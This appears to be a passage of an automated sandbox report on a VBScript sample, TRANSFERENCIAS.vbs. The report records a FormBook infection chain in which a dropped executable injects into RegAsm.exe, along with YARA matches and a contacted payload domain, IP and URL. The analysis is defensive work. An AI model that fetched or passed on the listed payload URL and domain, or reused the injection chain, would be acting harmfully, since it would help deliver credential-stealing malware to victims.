Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user~1\AppData\Local\Temp\temp_executable.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Queries volume information: C:\Users\user\AppData\Local\Temp\temp_executable.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525551 Sample: TRANSFERENCIAS.vbs Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 22 transfer.adttemp.com.br 2->22 26 Multi AV Scanner detection for domain / URL 2->26 28 Malicious sample detected (through community Yara rule) 2->28 30 Yara detected FormBook 2->30 32 5 other signatures 2->32 8 wscript.exe 2 2->8         started        signatures3 process4 file5 20 C:\Users\user\AppData\...\temp_executable.exe, PE32 8->20 dropped 34 Benign windows process drops PE files 8->34 36 VBScript performs obfuscated calls to suspicious functions 8->36 38 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->38 40 Suspicious execution chain found 8->40 12 temp_executable.exe 15 3 8->12         started        signatures6 process7 dnsIp8 24 transfer.adttemp.com.br 104.196.109.209, 443, 49700 GOOGLEUS United States 12->24 42 Antivirus detection for dropped file 12->42 44 Machine Learning detection for dropped file 12->44 46 Writes to foreign memory regions 12->46 48 2 other signatures 12->48 16 RegAsm.exe 12->16         started        18 RegAsm.exe 12->18         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.196.109.209
 transfer.adttemp.com.br United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
transfer.adttemp.com.br 104.196.109.209 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://transfer.adttemp.com.br/qbDh2/sirdeeeeee.txt false
    		unknown